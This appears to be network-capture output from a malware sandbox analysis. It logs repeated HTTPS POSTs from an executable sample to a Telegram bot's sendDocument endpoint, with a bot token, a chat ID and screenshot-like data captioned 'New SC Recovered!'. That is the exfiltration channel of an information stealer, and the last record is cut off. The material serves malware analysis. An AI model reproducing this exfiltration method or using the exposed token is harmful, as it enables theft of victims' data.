                                                2024-05-17 23:37:43 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:37:43 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:37:43 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:37:43 UTC1407OUTData Raw: ad 4c 0d bd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 12 92 8b 05 c2 8a 28 a6 01 45 14 50 06 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57 0e a8 b9 39 c2 8c f0 07 6a 8e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 29 05 c2 8a 28 a0 02 8a 28 a6 07 5d 37 8c 62 b9 8e 24 96 d1 e3 f2 d7 00 ab 06 cf f2 c7 4a 92 6f 1b 43 3c 5e 53 69 a6 20 7a ba c8 18 fe 58 1f ce b8 da 2b 25 4a 09 41 25 f0 ea b7 ef 71 b9 36 e4 ff 00 9b 73 a2 d6 3c 4a ba 8e 90 ba 72 5b 32 aa b8 6f 31 9b 93 8c f6 c7 bf ad 73 b4 51 55 18 a8 de dd 5d c1 b6 ec 9f 40 a2 8a 2a 84 6f 69 5a b2 08 96 09 db 63 2f 0a de a2 ba ed 37 53 bb b8 6d af 78 04 08 32 f2 1d a0 e3
                                                Data Ascii: L3<Xn!O=5?OyckX,,\>k(EPgr\W9j]ryO>h%,$C)((]7b$JoC<^Si zX+%JA%q6s<Jr[2o1sQU]@*oiZc/7Smx2
                                                2024-05-17 23:37:43 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 39 30 37 63 64 65 39 30 32 62 62 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc8907cde902bb--
                                                2024-05-17 23:37:43 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:37:43 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:37:43 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.449740149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:38:04 UTC238OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9221f98904f2
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                2024-05-17 23:38:04 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 32 32 31 66 39 38 39 30 34 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 32 32 31 66 39 38 39 30 34 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 31 2f 32 30 32 34 20 31 38 3a 33 32 3a 35 31 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc9221f98904f2Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dc9221f98904f2Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/21/2024 18:32:51User
                                                2024-05-17 23:38:04 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:38:04 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:38:04 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:38:04 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:38:04 UTC1409OUTData Raw: 03 e7 da 28 a2 b5 30 36 f4 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8 5c 85 3e a0 f6 fc 28 d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 4a 4a 2c 17 0a 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb
                                                Data Ascii: (06OgcX/a\>(I=-`pJJ,(Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN
                                                2024-05-17 23:38:04 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 32 32 31 66 39 38 39 30 34 66 32 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9221f98904f2--
                                                2024-05-17 23:38:04 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:38:05 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:05 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.449742149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:38:10 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc97bb00ca1497
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:38:11 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 37 62 62 30 30 63 61 31 34 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 37 62 62 30 30 63 61 31 34 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 38 2f 32 30 32 34 20 32 31 3a 33 30 3a 35 36 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc97bb00ca1497Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dc97bb00ca1497Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/28/2024 21:30:56User
                                                2024-05-17 23:38:11 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:38:11 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:38:11 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:38:11 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:38:11 UTC1409OUTData Raw: 03 e7 da 28 a2 b5 30 36 f4 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8 5c 85 3e a0 f6 fc 28 d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 4a 4a 2c 17 0a 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb
                                                Data Ascii: (06OgcX/a\>(I=-`pJJ,(Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN
                                                2024-05-17 23:38:11 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 37 62 62 30 30 63 61 31 34 39 37 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc97bb00ca1497--
                                                2024-05-17 23:38:11 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:38:11 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:38:11 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.449743149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:38:15 UTC238OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9b180ffd53ff
                                                Host: api.telegram.org
                                                Content-Length: 66995
                                                Expect: 100-continue
                                                2024-05-17 23:38:15 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 62 31 38 30 66 66 64 35 33 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 62 31 38 30 66 66 64 35 33 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 